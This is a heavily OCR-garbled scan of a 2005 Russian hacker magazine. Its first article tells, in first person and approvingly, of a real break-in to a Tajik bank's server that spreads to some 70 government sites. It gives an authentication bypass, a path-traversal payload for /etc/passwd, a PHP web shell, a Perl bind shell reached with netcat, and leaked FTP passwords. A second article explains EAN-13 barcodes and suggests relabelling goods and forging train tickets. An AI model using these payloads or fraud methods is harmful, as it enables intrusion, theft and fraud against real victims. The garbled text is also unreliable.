который раз, пройдясь по линкам 
английской версии сайта, я убе- 
дился, что структура осталась 
прежней. Стоп! Раз структура сох- 
ранилась, значит, должна сохра- 
ниться и админка. Каково же бы- 
ло мое удивление, когда, обратив- 
шись к тт.пЫ\}/еп/адтіп, я уви- 
дел, что английская версия ад- 
минки не была запаролена! Чем 
это объяснить? Тут можно только 
гадать, так как никто не подозре- 
вал, что ей будут пользоваться, 
ведь, скорее всего, сайтом управ- 

или же это просто критический 
недочет ѵѵеЬ-мастера. Но сейчас 
это не главное, сейчас я внутри. 
Интерес сильнее осторожности :). 
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[косяк админа] С первых же 
секунд я принялся изучать воз- 
можности, доступные из админки. 
Первые несколько пунктов несли 
разочарование — из функций бы- 
ли лишь просмотр и редактирова- 
ние статей, размещенных на сай- 
те. Моя попытка исполнить рПр- 
скрипт в теле статьи не увенча- 
лась успехом — я лишь увидел 
его исходный код. Можно было бы 
поставить снифер и попытаться 
поймать сессию админа, но что 
бы это дало? Я сомневался, что 
возможности русифицированной 
админки больше, чем английской. 
Дальше — больше: раздел Рііез 
— просмотр архива всех статей 
и загрузка файлов. Все — вот 
оно. Нетерпеливо кликнув по 
ссылке для перехода к файл-ме- 
неджеру, я вновь получил отказ. 
Мне вежливо предложили зало- 
гиниться и даже уже вписали за 
меня логин: пЬ^ІІр. Теперь оста- 
валось угадать пароль, и я прак- 
тически получаю веб-шелл. 
Пара отчаянных попыток отга- 
дать пароль с лета не увенчались 
успехом. Я остановился и начал 
соображать: сообщение над 

строкой формы логина гласило: 
Зітріе Рііе Мападег — І_одіп. 

В тот же момент я обратился к 
багтракам. Не один из них не 
знал такого скрипта и не содер- 
жал упоминаний как о данной 
версии, так и о предыдущих ре- 
лизах. Мои надежды на удачный 
взлом таяли с каждой минутой, 
от безысходности я вновь вер- 
нулся к авторизации. 

В правом нижнем углу был линк 
на сайт разработчика, откуда 
впоследствии я скачал исходни- 
ки скрипта. Автор распростра- 
нял его бесплатно, и, что самое 
интересное, он был еще в ста- 
дии альфа тестирования, а зна- 
чит, шансы на то, что скрипт со- 
держит недоработки, резко уве- 
личивались. Я решил искать 
уязвимости сам. 
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[кодерский косяк] Решив ознако- 
миться с принципом работы скрипта и 
посмотреть, какие возможности кро- 
ются внутри, я залил его на свой сер- 
вер и залогинился под известным мне 
аккаунтом, предлагаемым разработ- 
чиком для тестирования: диезІ:сІето. 
Данные о пользователе хранились в 
самом скрипте Іт.рНр. Полазав по сво- 
им папкам, я нажал пимпу Іодоиі и вер- 
нулся к процессу авторизации. Вот что 
я заметил, проделав операцию логина 
еще раз: данные о пользователе пере- 
давались скрипту методом РОЗТ в пе- 
ременных $изег и $разз\л/оп± Если ав- 
торизация прошла успешно, то скрипт 
пропускал меня внутрь. Что самое ин- 
тересное, в адресной строке после 
этого добавлялась переменная 
$и=диезІ. Таким образом, скрипт сле- 
дил за тем, какой пользователь зало- 
гинен в данный момент. Если поменять 
значение переменной $и, то скрипт за- 
ругается и отправит меня к форме ав- 
торизации. Так вот же она моя бага, 
подумал я! Сделав логаут, я вновь очу- 
тился перед окошком ввода логина и 
пасса, только на этот раз я сообщил 
скрипту переменную $и, содержащую 
мой логин, который, кстати, автомати- 
чески прописывается в поле формы. 
После обновления страницы я добился 
того, чего хотел: авторизация была ус- 
пешно обманута. Посмотрев исходни- 
ки скрипта, я лишь только убедился в 
своей правоте: скрипт давал возмож- 
ность редактировать переменную $и, 
которая была как бы флагом автори- 
зации посредством (ЗЕТ запроса: 

ІІ (із5еІ($_ВЕ0иЕ8Т['и 1 ])) { $и = 
$_КЕСШЕЗТ['и']; } 
еізе { $и = } 

Эта строчка и позволяла мне беспрепя- 
тственно изменить значение перемен- 
ной, объявив скрипту, что я честно про- 
шел процедуру авторизации и мне мож- 
но доверять. Критическая ошибка прог- 
раммиста-утырка сыграла мне на руку! 
Уверенный в своей удаче, я решил на- 
конец-таки разобраться с сайтом бан- 
ка до конца. 

Перейдя к файл-менеджеру по адресу 
ѵѵѵѵѵѵ.пЬиі/еп/ііІез/іт.рІір, я очутился перед 
знакомым окошком. Как и полагается, ло- 
гин пользователя был уже прописан в сво- 
ем поле, а это все, что мне было нужно. 
Я быстро переправил урл на ш/ѵѵ.пЫ.іу 
еп/Шз/іт.рІір?и=пЬЩр, и скрипт с удо- 
вольствием авторизировал меня. 
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На нашем диске ты най- 
дешь все программы, 
описанные в статье, 
а также видеоиллюст- 
рацию к этому взлому. 
Чтобы всякие утырки 
не говорили, что все это 
мы придумали сами. 



[ХАКЕР 12 [84] 05 > ВЗЛОМ 051 ] 




[ХАКЕР 12 [84] 05 > ВЗЛОМ 052 ] 




вот она какая, наша система 



[сплошной геасі опіу] Каково же 
было мое разочарование, когда я об- 
наружил, что права на создание и ре- 
дактирование файлов скрипт не пре- 
доставляет, также отсутствуют права 
на аплоад файлов на сервер. В об- 
щем, сплошной геасі опіу :(. Рабочая 
директория была ограничена: скрипт 
отказывался подниматься уровнем 
выше, и были доступны только корне- 
вая папка, где и был проинсталлиро- 
ван скрипт, причем хитрый автор зап- 
рограммировал его скрывать самого 
себя от глаз пользователя. Одним сло- 
вом, я увидел совсем не то, что ожидал. 
И с этим надо было как-то бороться. 
Наученный опытом подделки перемен- 
ной $и, я тщательно следил за структу- 
рой урла и переменных, которые пере- 
даются скрипту. Мое подозрение пало 
на процесс просмотра файла, когда че- 
рез переменную есііі скрипту передава- 
лось имя файла, указанного пользовате- 
лем. Хм, а что если передать перемен- 
ной что-то типа /../еіс/разз- 

ѵѵсі? Таким образом, исправив урл на 
ѵѵѵѵѵѵ.пЫ. 1}/епДНе/іт .рЬр ?и=пЬЦНр& есШ= 
. ./. У. У. У. У. У. У. ./еіс/раззѵѵсІ& сорІ= 1 , 
я смог просматривать любые файлы 
на сервере, которые были доступны 
моему пользователю. Я решил посмот- 
реть исходник скрипта, для чего задал 
значение переменной $есІіІ, равное 
Іт.рЬр. Как я и ожидал, внутри сорца 
были жестко прописаны админские 
реквизиты: пЫіКр:КрпЬ02. 

После этого произошло самое ужас- 
ное: я задался извечным русским воп- 
росом «что делать?». Мне хотелось 
намного большего, чем просто прос- 
мотр файлов, а свежих идей в голове 
практически не оставалось. 



бинд-шелл на 32767-ом порту 
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[сервер изнутри] Решив немного 
отвлечься, я принялся читать авторское 
описание скрипта. Разработчик писал: 
«данный скрипт создан как альтернати- 
ва РТР и предназначен для людей, у ко- 
торых нет возможности пользоваться 
фтп, или им по каким-то причинам от- 
казано в доступе». Ну конечно, фтп! 
Вопреки всей логике автора програм- 
мы я попытался залогиниться на 
фтпшник с добытыми логином и пас- 
сом, и, что самое удивительное, меня 
пропустили — вот он, доступ. На ско- 
рую руку я настрочил следующий код: 

<? 

есИо "<рге>"; 
разз^ги^бЕТ^стсП); 
есііо "</рге>"; 

?> 

Выбрав неприметную директорию на 
сервере, я залил свой скрипт под име- 
нем зеагсЬ.рЬр, чтобы тот не сильно 
выделялся среди других файлов. Сю- 
да же я залил и ЬіпсІ.рІ — бинд-шелл на 
перле со стандартными настройками 
бинда на 32767-ом порту. Забиндив 
для себя порт, со своего веб-шелла ко- 
мандой регі ЬіпсІ.рІ, я приконнектился 
пеісаі'ом к серву: 

пс.ехе ѵѵш/.пШ] 32767 

Играем дальше. Первым делом я узнал, 
кто еще пользуется системой в данный 
момент, и последние подключения: 

ѵѵііо; 

Іазі -10; 

К счастью, админов на месте не было, 
и я работал с машиной один. Дальше 
я выяснил свои права и операционку, 
установленную на сервере: 

іф ипате -а; 

Оказалось, что я работал из-под юзе- 
ра арасЬе, а сервачок крутился под уп- 
равлением депіоо с ядром 2.6.1 1 . К со- 
жалению, рута здесь взять не получит- 
ся, хотя чего еще я ожидал здесь уви- 
деть? Оставшись без рутового шелла, 
я принялся исследовать сервер даль- 
ше. Просмотрев папку Ыбосз, я с удив- 
лением обнаружил, что на этом сер- 
вачке хостится еще около 70 сайтов, 
среди которых были замечены проек- 
ты Министерства Иностранных Дел, 
Министерства Финансов, Сайт Прези- 
дента, еще несколько банков, интер- 
нет-провайдер, телевидение и газета. 
В общем, весь Таджикистанский хай- 
тек поместился на одном сервере, ко- 
торый из-за админов-наркоманов 
вскоре позволил мне получить полный 
доступ ко всем сайтам, включая ре- 
сурс Президента республики Точикис- 
тон :). Я вот до сих пор сдерживаю се- 
бя от того, чтобы поменять фотогра- 
фию Президента на свою :). 





[по порядку] Однако не будем забе- 
гать вперед, расскажу все по порядку. 
Размышляя над тем, как лихо мне уда- 
лось получить доступ к РТР, я пришел к 
выводу, что для каждого сайта сделана 
своя учетная запись и каждому ресурсу 
позволено юзать РТР. Вспомнив логи 
птар, я узнал, что на серве установлен 
РгоРТРЭ. Я решил найти конфиги это- 
го сервиса и посмотреть, какие учет- 
ные записи там есть. Для этого я вы- 
полнил следующую команду: 

# ТіпсІ / -ѣуре I -пате "ргоІІрсГ"; 

Среди найденных файлов, есть то, что 
мне нужно, — это файлик /еіс/ргоіірсі/ 
ргоіірсі.сопі. Просмотрев его, я просто 
обомлел. Никогда еще такого не видел. 
В заголовке каждого блочка с описани- 
ем ТСр-пользователя в комментарии был 
прописан ПАРОЛЬ этого юзера! Напри- 
мер, описание логина с говорящим наз- 
ванием ргезісіепи] выглядело так: 

# ргезісіепі.!] 

# р:ЗотопТ] 

ІІзегргезісІепІ 

Ѳгоир изегз 

МахСІіепІз 10 

АпопВедиігеРаззѵѵогсІ оп 
ВедиігеѴаІісІЗііеІ оТТ 

АІІоѵѵОѵегѵѵгіІе оп 

Получив доступ ко всем Кр-аккаунта 
на сервере, я решил продолжить свои 
изыскания. Покопавшись в различных 
скриптах, я выудил несколько тузці- 
аккаунтов. Однако, вопреки ожидани- 
ям, в базах данных я не нашел никаких 
сведений о маршрутах поставок гаши- 
ша, оружия и перевозки иммигрантов; 
все, что было в базе, — это тексты 
публикаций и прочий мусор. Хотя в БД 
одного банка, я обнаружил нечто похо- 
жее на систему авторизации. На их 
сайте я прочитал, что они вскоре пла- 
нируют открыть сервис онлайн-бан- 
кинга. Ну вот, сервис еще не открыли, 
а доступ уже есть :). 



[вместо заключения] Все просто 
элементарно. За несколько часов рабо- 
ты я поимел все онлайн-представитель- 
ства целой страны. Возможно, некото- 
рые скажут, что взлом во многом при- 
митивен: пустой пароль в скрытой ад- 
минке, элементарный баг воспаленного 
программерского мозга, маразматич- 
ное решение администратора записать 
пароли пользователей в комментариях 
конфига Кр-сервера. Однако такое по- 
ложение дел во многом показательно, 
не следует думать, что такое «разгвоз- 
дяйство» — единичный случай. Многие 
администраторы, особенно на постсо- 
ветском пространстве, относятся к воз- 
можности взлома, как к чему-то сверхъ- 
естественному, что происходит с кем 
угодно, но только не с ними. 

Как показал мой пример, внедряя хай- 
тек, нужно быть очень осторожным. 
А то получится такой же косяк, как и у 
точикистонцев е 






ПОЛЕЗНЫЕ ССЫЛКИ 

•Утилита Ыеісаі, без которой не обходится ни один 
взлом: 

Шр://сезпеі.сі1.зоигсеіогде.пеі/зоигсеіогде/пеісаі/пеісаі- 

0.7.1.іаг.ді 

• Популярный сканер Ытар: 
ѵѵѵѵ\А/.іпзесиге.огд/птар/птар_с1о\А/пІоасі.МтІ 

• Важный скрипт Зітріе Рііе Мападег с идиотской дыркой, 
благодаря которой я поимел все серверы Таджикистана: 
Шр://зоигсеіогде.пеі/рго}есі/зІпо\А/ііІез.рІір?дгоир_ісі=60333 

• ЬіпсІ.рІ — перловый скрипт, биднящий шелл 
на указанном порту: ѵѵѵѵѵѵ.оак.Ііи/аѵаіаг/ЫпсІ.рІ 



I Следует понимать, что все, что 
I я проделал — это противозаконно. 
I Эта статья дана лишь для ознаком- 
I ления и организации эффективной 
I защиты. За применение материала 
I в незаконных целях, несешь ответ- 
I ственность только ты сам. Соблю- 
■ дай законы своей страны. 



веб-шелл не должен выделяться среди остальных файлов 





Зашел на сайт изучаю скрипты 



Н ашел админку ѵѵѵ.пЬі-у/агіппіп 



Вспомнил про английскую версию ѵѵѵ.пЫ-у/еп 



Нашел админку вез пароля ѵѵѵ.пЫу/еп/айппігі 



Чтобы валить файл нужен пароль 



Скачау^ скрипт файлменеджера 

Нашел идиотский ваг авторивации 

V 



Залить файл невозможно, зато научился читать 



Вытащил пароль ив Тт.рЬр: 

ѵ ѵ ѵ.пЬіу /еп/1 г і1е/тт.рІ _ ір?и=пЬу ■Г^рй.ейі+=Т'гм.рІ’ір 



Залогинился по РТР - пЬуіЧр:ТСрпЬ02 
Залил ѵеЬ-шелл ^ 



Нашел конфиг ГТР-сервера, а в нем - пароли! 



ВАЖНЫЙ ДВИЖОК 

На взломанном сайте использовался движок Зітріе Рііе 
Мападег, который можно скачать по адресу Ыір://зоигсе- 
іогде .пеі/ргоіесі/з/іоѵѵЛІез.рІір ?дгоир_іб=60333. В скрипте 
допущена идиотская ошибка, которую мог сделать толь- 
ко школьник девяти лет. После авторизации пользовате- 
ля в качестве флага, обозначающего тот факт, что он 
ввел корректный пароль, скрипту передается ОЕТ-пере- 
менная и, указывающая логин, под которым вошел поль- 
зователь. Таким образом, для авторизации достаточно 
лишь подставить требуемый логин в эту переменную. Это 
уже жесткий баг, но еще хуже становится от того факта, 
что скрипт сам сообщает взломщику требуемый логин: 
он подставляет его в форму авторизации. Придурошный 
ход для сомнительного повышения изаЬіІйу обернулся 
жестким багом. 





СПРАШИВАЙТЕ В МАГАЗИНАХ ЭЛЕКТРОНИКИ! 

Кгайѵѵау является зарегистрированным товарным знаком «Крафтвэй корпорэйшн ПЛС» 

Місгозоф ѴѴІпсІоѵѵз, логотип ѴѴІпсІоѵѵз ХР Месііа Сепіег ЕсІІІІоп являются зарегистрированными товарными знаками корпорации МісгозоП или ее отделений в США и других странах. 



фкпагНямау* 

ТЕХНОЛОГИИ ДЛЯ ЛЮДЕЙ 



МісгозоІТ" 

Т*/ѴѴІПСІ0ѴѴ5 Х Р 

— ' Месііа Сепіег ЕсІІІІоп 

ГЛАВНОЕ - это ИДЕЯ!!! 

Тебе нужен цифровой видеомагнитофон, 
фотоальбом, РѴР-проигрыватель, телик, 
радио, игровая приставка, трЗ и СР-плеер? 
КгаІІѵѵау іРЕА МС с МісгозоІТ ѴѴІпсІоѵѵз ХР 
Месііа Сепіег Есііііоп 2005 легко заменит тебе все это. 

И не забудь, что это еще и МОЩНЫЙ КОМПЬЮТЕР! 



ѵѵѵѵѵѵ. .г и 






ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20ЫЕ РЕВВІІМ НЬЮСЫ 




Лошадь в полоску 



Описание и уязвимости технологий штрихкодов 



МЫ ВСТРЕЧАЕМ ИХ ВЕЗДЕ: НА УПАКОВКАХ ТОВАРОВ, НА КНИГАХ И ЖУРНАЛАХ, НА КОРОБКАХ ИЗ-ПОД СО, НА 
ПРОДУКТАХ И ДАЖЕ НА БИЛЕТАХ ПРИГОРОДНЫХ ЭЛЕКТРИЧЕК. ОНИ ОКРУЖАЮТ НАС ПОВСЮДУ, ПРОЧНО ВОЙДЯ 
В НАШУ ЖИЗНЬ. МЫ ТАК ПРИВЫКЛИ К НИМ, ЧТО ДАЖЕ НИКОГДА НЕ ОБРАЩАЕМ НА НИХ ВНИМАНИЯ. Я ИМЕЮ В 
ВИДУ ШТРИХКОДЫ, РИСУНКИ, СОСТОЯЩИЕ ИЗ ПОЛОСОК, КОТОРЫЕ СЧИТЫВАЮТ ЛАЗЕРОМ ПРОДАВЩИЦЫ В СУ- 
ПЕРМАРКЕТАХ И ТУРНИКЕТЫ НА Ж/Д СТАНЦИЯХ. ТЕБЕ НИКОГДА НЕ БЫЛО ИНТЕРЕСНО, КАКУЮ ИНФОРМАЦИЮ 
СОДЕРЖАТ В СЕБЕ ЭТИ ЧЕРНО-БЕЛЫЕ КОДЫ? КАК ФУНКЦИОНИРУЕТ ЭТА ТЕХНОЛОГИЯ, НАСКОЛЬКО ОНА ЭФ- 
ФЕКТИВНА И, САМОЕ ГЛАВНОЕ, НАСКОЛЬКО ОНА УЯЗВИМА I Воззотаіпааг (гоззотаІпааг@ таіі.ги) 



[объект изучения] Штриховой код (Ьагсосіе) представля- 
ет собой последовательность черных и белых полос, содер- 
жащих в себе некоторую информацию. Все разновидности 
штрихкодов можно разделить на три вида: линейные, двух- 
мерные и композитные. 

Линейный штрихкод читается в одном направлении и имеет 
большое число разновидностей, например, ЕАІ\І, ІІРС, 
СосІеЗЭ, СосІе128 и другие. Насколько мне известно, этих ви- 
дов насчитывается уже более сотни. Такие коды могут содер- 
жать небольшой объем информации (до 20 — 30 символов). 
Двухмерные (Тѵѵо-сІітепзіопаІ или 20-сосІе) Ьаг-коды рас- 
шифровываются в двух измерениях: по вертикали и по гори- 
зонтали, что требует более сложного оборудования, чем для 
считывания линейных кодов. Они могут включать в себя го- 
раздо больший объем информации (до нескольких страниц 
текста). Разработано более 20 различных символик двух- 
мерных штрихкодов. Наиболее популярны коды — РЭР417, 
Оаіатаігіх, АгХес. 

Композитный код объединяет в себе двухмерный и линей- 
ный код, позволяя таким образом использовать для считы- 



сканер штрихкодов 



вания различное оборудование. Пример 
такого кода — АтХес Меза. 

Для большинства символик значение цифр, 
входящих в штрихкод, определяется разра- 
ботчиком системы. Наиболее распростра- 
ненной символикой с предопределенными 
значениями позиций являются товарные 
символики: ЕАІЧ-13, ЕАІМ-8, ІІРС-А и ІІРС-Е. 
[ЕАЫ-ІІСС] ЕАІМ (Еигореап Агіісіе І\ІитЬегіпд) Іпіегпайопаі — это Некоммерческая 
Международная Ассоциация, управляющая международной системой товарной ну- 
мерации и стандартов штрихового кодирования. На территории России действует 
ассоциация автоматической идентификации ЮНИСКАН/ЕАЫ (тѵі /ѵ.еап.ги), являю- 
щаяся представительством ЕАІ\І в нашей стране. 

Часто можно встретить аббревиатуру ЕАІМ вместе с аббревиатурой ІІСС (ІІпіІогт Собе 
СоипсіІ) — организацией, занимающейся распространением стандартов штрихового 
кодирования на территории США. Следствием взаимодействия этих организаций ста- 
ла совместимость продвигаемых ими стандартов (ІІСС имеет свой стандарт кодирова- 
ния ІІРС (ІІпіѵегзаІ Ргобисі Собе), который является прародителем кодировок ЕАІМ). 








ПОЛЕЗНЫЕ ПРОГРАММЫ 

ЕАІЧ-13 СоипігуРіпсІег — умеет определять региональную при- 
надлежность или принадлежность к определенным видам пе- 
чатной продукции товарного кода ЕАІМ-1 3 по первым трем 
цифрам. 

Вагсосіе Іог Ойісе — тулза, позволяющая легко и непринужден- 
но создавать наиболее распространенные виды (25 видов и 
разновидностей) линейных кодов. Встраивается в приложения 
МісгозоЙ ОЯісе, что позволяет вставлять в них рисунок 
штрихкода прямо из меню: Вставка -» Объект. . . -> Восаі 
Вагсосіе. Весьма удобна для создания штрихкодов. Единствен- 
ное ограничение триальной версии — надпись ТгіаІ Опіу, рас- 
положенная над создаваемым рисунком. 



7 7 



6 0 $ 



10 1 0ОЭ 



штрих-код ЕАЫ-13 



К примеру, код ЕАЫ-13 отличается от кода ІІРС-А наличием дополнитель- 
ной цифры (стоящей в начале кода, но не рисующейся полосками), поз- 
волившей значительно расширить диапазон маркированных товаров. 

В настоящее время около миллиона компаний в 133 странах мира ис- 
пользуют стандарты ЕАЫ-ІІСС в повседневной практике. Ежедневно 
осуществляется свыше 5 миллиардов сканирований кодов ЕАЫ/ІІРС. 

[код ЕАЫ-13] Этот код представляет для нас наибольший интерес, так 
как используется повсеместно в сфере розничной торговли. Лучше все- 
го начинать знакомство с линейными штрихкодами. На рисунке изобра- 
жен пример кода ЕАЫ-13, посмотрим, из чего он состоит. А состоит он 
из тридцати двух черных полосок различной ширины, кодирующих три- 
надцать цифр и, собственно, надписи из этих самых цифр. 

Первые 2 — 3 цифры кода означают принадлежность к различным реги- 
ональным отделениям ЕАЫ или принадлежность к печатной продукции. 
По ним можно определить, в какой стране изготовлен товар, помечен- 
ный этим штрихкодом (для этого задействуй, к примеру, прогу ЕАЫ-13 
СоипІгуРіпбег). Далее 4 — 5 цифр означают код, присвоенный изготови- 
телю товара. Это по стандартам ЕАЫ, а на деле многие страны, в том 
числе Россия присваивают производителям 7 цифр. Оставшиеся цифры 
присваиваются различным товарам данного производителя. Последняя 
цифра, контрольная, служит для проверки корректности считанного ко- 
да. Алгоритм вычисления контрольной цифры весьма прост: 

\Л Сложить цифры, стоящие на четных местах: 

7+1+0+1+1+0=10 

\2\ Полученную сумму умножить на 3: 

10*3=30 

[з] Сложить цифры, стоящие на нечетных местах, без контрольной цифры: 
9+7+6+9+0+0=31 

И Сложить числа, указанные в пунктах 2 и 3: 

30+31=61 

[б] Возьмем остаток от деления на 10: 

31%10=1 

[б] Из 10 вычесть, полученное в пункте 5: 

10-1=9 — контрольная цифра. 

Как видишь, наш штрихкод правильный. Несовпадение контрольной циф- 
ры на штрихкоде товара, скорее всего, означает, что товар поддельный. 
Теперь обратим внимание на графическую часть штрихкода. По краям 
и посередине кода находятся пары тонких черных полос, выделяющих- 
ся вниз, разделяя надпись из цифр. Они не содержат в себе никакой ин- 
формации, а нужны для того, чтобы сканер мог подстроиться под разме- 
ры изображенного кода и четко определить его границы. Таким обра- 
зом, весь штрихкод как бы разделен на две равные части. 

Каждая цифра, кроме самой первой, кодируется и в графическом виде 
представляется двумя черными полосками. Первая цифра не кодирует- 
ся, а определяется в зависимости от того, какие кодировки используют 



следующие за ней шесть цифр. Код ЕАЫ-13 использует три вида коди- 
ровок: собе А, собе В, собе С. Двоичный код собе С получается в резуль- 
тате проведения операции логического отрицания собе А, то есть ЫОТ 
собе А, а собе В — это «обратный» собе С. В двоичной системе цифры 
этих кодировок выглядят следующим образом: 





Собе А 


Собе В 


Собе С 


0 


0001101 


0100111 


1110010 


1 


0011001 


0110011 


1100110 


2 


0010011 


0011011 


1101100 


3 


0111101 


0100001 


1000010 


4 


0100011 


0011101 


1011100 


5 


0110001 


0111001 


1001110 


6 


0101111 


0000101 


1010000 


7 


0111011 


0010001 


1000100 


8 


0110111 


0001001 


1001000 


9 


0001011 


0010111 


1110100 



Несложно догадаться, что единицы будут графически выглядеть на 
штрихкоде как закрашенные области кода, нули — как не закрашенные. 
Разделительные полосы по краям кода можно обозначить как 101 , а по- 
середине — как 01010. Правая часть кода (последние шесть цифр) ЕАЫ- 
13 всегда кодируется, как собе С. Цифры левой части кода могут коди- 
роваться методами А и В в зависимости от первой цифры штрихкода. 
Зависимость эту можно представить следующим образом: 



Ы° цифры => 
7 

0: 
1: 
2: 
3: 
4: 
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А 
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А 

В 
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6: 

7: 
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В 

В 



Взгляни на рисунок кода ЕАЫ-13. Первая цифра — 9, значит, следую- 
щие шесть будут закодированы как АВВАВА. Это объясняет, почему, 
идущие после девятки семерки, имеют разный рисунок. 

Применение трех видов кодировок в коде ЕАЫ-13 осуществлено вовсе 
не для того, чтобы их было труднее расшифровать, а для обеспечения 
совместимости со стандартом ІІРС-А. ІІРС-А имеет 12 цифр, каждая из 
которых преобразуется в полоски, шесть первых — методом А шесть 
последних — методом С. Таким образом, сканер, работающий по стан- 
дарту ЕАЫ, присвоит такому коду 0 в начале. 



[халява от ЕАЫ] Европейским хакерам в восьмидесятых годах прош- 
лого века не составило труда разобраться в кодировках ЕАЫ-13. Многие 
товары, такие как одежда, продававшаяся в супермаркетах, помеча- 
лись наклейкой со штрихкодом, которую хакеры заменяли своей, анало- 
гичной тем, что были на более дешевых товарах того же типа. Вскоре 
подделка штрихкодов превратилась в новый вид мошенничества. 

Код ЕАЫ-13, присваиваемый определенному продукту, не содержит в се- 
бе никаких данных об этом товаре (цена, вес и пр.). Все эти данные содер- 
жатся в базе данных, из которой их 

• „ипѵпѵш.и, , и извлекает кассовый аппарат при ска- 

изучение штрихкодов и нировании штрихкода на упаковке 
кодирования информации продукта. Впрочем, это не всегда так. 

Многие продукты, цена которых зави- 
сит от веса, продаются в супермарке- 
тах со штрихкодами, наклеенными 
самим супермаркетом. В зависимос- 
ти от системы применяющейся в ма- 
газине, такие штрихкоды могут либо 



Следует понимать, что 
изучение штрихкодов и 
кодирования информации 
— это наука, хобби. А вот 
использование в корыст- 
ных целях полученных на- 
выков — уголовщина, за 
которую будешь отвечать 
перед законом. 



[ХАКЕР 12 [84] 05 > ВЗЛОМ 057 ] 







[ХАКЕР 12 [84] 05 > ВЗЛОМ 058] 



ДРУГИЕ ШТРИХКОДЫ 
ДАЛЕЕ ХОЧУ ОЧЕНЬ 
КРАТКО ОЗНАКОМИТЬ 
ТЕБЯ С ДРУГИМИ ЧАСТО 
ПРИМЕНЯЮЩИМИСЯ 
ШТРИХКОДАМИ. 

ІІСС/ЕАМ 128 создан для 
автоматизации логистичес- 
ких операций (то есть дви- 
жения товаров от произво- 
дителей к потребителям) и 
повсеместно применяется в 
оптовой торговле. Он мо- 
жет содержать в себе мно- 
жество информации, такой 
как размеры, вес, даты из- 
готовления, информацию о 
производителе и т.д. Этот 
код включает в себя симво- 
лы компьютерных кодиро- 
вок АЫЗІ и ІІІЧІССЮЕ. Су- 
ществует три набора симво- 
лов данного кода (А, В и С). 

Двухмерные штрихкоды по- 
лучили распространение 
значительно позже линей- 
ных. В основе их лежит 



идея независимой базы 
данных, содержащей ин- 
формацию об определен- 
ном объекте. Первым 20- 
баркодом стал РЭР417, вве- 
денный в 1991 году фирмой 
ЗутЬоІ Тесііпоіодіез. РЭР 
происходит от сокращения 
РогІаЫе ОаХа Рііе (Портатив- 
ный Файл Данных). Его 
штрихкодовый символ сос- 
тоит из 17 модулей, каждый 
из которых содержит 4 
штриха и пробела (отсюда 
номер 417). Этот штрихкод 
открыт для общего пользо- 
вания. Структура данного 
кода поддерживает кодиро- 
вание максимального числа 
от 1000 до 2000 символов в 
одном коде при информа- 
ционной плотности от 1 00 
до 340 символов. Каждый 
такой код содержит старто- 
вую и стоповую группы 
штрихов, увеличивающие 
высоту штрихкода. Сущест- 
вует также разновидность 
этого кода — Місго РЭР417. 



Атіес Собе был введен Энди 
Лонгэйсером (Апсіу Ьопдасге) 
из фирмы ѴѴеІсИ АІІуп Іпс. 
в 1 995 году и открыт для об- 
щего использования. АЛес 
Собе разрабатывался для 
легкой печати и легкой рас- 
шифровки. Он представляет 
собой квадратную матрицу с 
концентрическими квадрата- 
ми в центре, которые служат 
для определения позиции 
кода относительно сканера и 
мерной линейкой по краю 
кода. Наименьший штрихкод 
АЯес имеет площадь 1 5x1 5 
модулей, наибольший — 
151x151. Минимальный код 
АЛес кодирует 1 3 цифр или 
12 букв, а максимальный — 
3832 цифры или 3067 букв 
или 1914 байт данных. Сим- 
волика этого кода не требует 
свободной зоны вокруг 
штрихкода. Существуют 32 
градации размера кода с 
возможностью пользова- 
тельской установки защиты 
от ошибок по методу Рида- 



Соломона (ВеесІ-ЗоІотоп): 
от 5% до 95% от области ко- 
да. Спецификацию Ацтека 
можешь найти на 
/7 Пр://6с6. ѵѵеісііаііуп.сот/іесііо 
ѵег/сіссіѵѵііііе.іііт . 

Код ОаХа Маігіх — двухмер- 
ный код от фирмы СіМаІгіх, 
разработанный для разме- 
щения большого объема ин- 
формации на ограниченной 
площади поверхности. ОаХа 
Маігіх может хранить от од- 
ного до 500 символов. ОаХа 
Маігіх имеет теоретическую 
максимальную плотность в 
500 миллионов символов 
на дюйм! На практике плот- 
ность, конечно, ограничива- 
ется разрешающей способ- 
ностью печатающих уст- 
ройств и сканеров. Наиболее 
популярными применениями 
Оаіатаігіх является марки- 
ровка небольших предметов, 
таких как электронные эле- 
менты и печатные платы 
электронных приборов. 



содержать привязку к базе дан- 
ных товаров, либо содержать 
сведения, влияющие на цену или 
вес. И в том, и в другом случае 
есть возможности для мошенни- 
чества. Иногда магазины сами 
упрощают задачу мошенникам. 
Например, в большинстве мос- 
ковских супермаркетов вес и ко- 
личество товара указывается 
явно в коде, указанном на нак- 
лейке с товаром. Понятно, что 
ничего тебе не мешает напеча- 
тать на самоклеящейся бумаге 
собственную этикетку и купить 
килограмм дорогих груш по це- 
не самых дешевых. Такого рода 
махинаций можно придумать ог- 
ромное множество, суть у них у 
всех одна. Люди привыкли на 
100% доверять электронным 
системам в торговле, в то время 
как использование штрихкодов 
не всегда реализовано адекват- 
но с точки зрения безопасности. 
Можно придумать кучу спосо- 
бов поднятия лавэ с подделки 
штрихкодов, иногда очень специфических. Следует понимать, что од- 
но дело — изучать системы кодирования и находить в них потенци- 
альные слабости, и совсем другое — на практике использовать раз- 
работки, воруя груши и одежду. Это уже классифицируется безжало- 
стным уголовным кодексом как мошенничество — серьезная статья. 

[халява в электричках] Думаю, ты не раз и не два катался на элект- 
ричках. Сейчас на многих станциях уже стоят электронные турникеты, 
которые не пропускают пассажиров, пока те не «покажут» билетик. Ес- 
ли ты разглядывал его, то, конечно, заметил, что на нем располагается 
специальный штрихкод, который и считывает турникет. Встает вопрос, 
какая информация размещается в коде билета, в каком виде она там 
хранится и возможно ли ее подделать. 

Считать код билета оказалось проще простого, так как используется станда- 
ртное кодирование ІпІегІеаѵесІ 2-ОІ-5. Я не буду рассказывать, как устроено. 
Об этом ты сможешь почитать на документах, которые лежат на диске. Я луч- 
ше поведаю тебе о том, чего удалось добиться хакерам железных дорог. 



Как выяснилось, информа- 
ция о билете (дата, разно- 
видность, зоны, цена и так 
далее) довольно хитрым об- 
разом кодируется в число, 
записываемое на билет. 
Наивно было бы ожидать, 
что эти данные будут нахо- 
диться на поверхности. 
Однако человеческий энту- 
зиазм безграничен: куча лю- 
дей принялась собирать ба- 
зы данных с номерами биле- 
тов, пытаясь уловить какую- 
то закономерность между 
параметрами «тикета» и его 
кодом. Это было не так уж 
легко, но в конце концов хит- 
рый код все-таки поддался 
хакерам и некоторые время 
можно было наблюдать 
нервных дядек у касс, за 5 рублей продающих билетики «до любой зоны». 
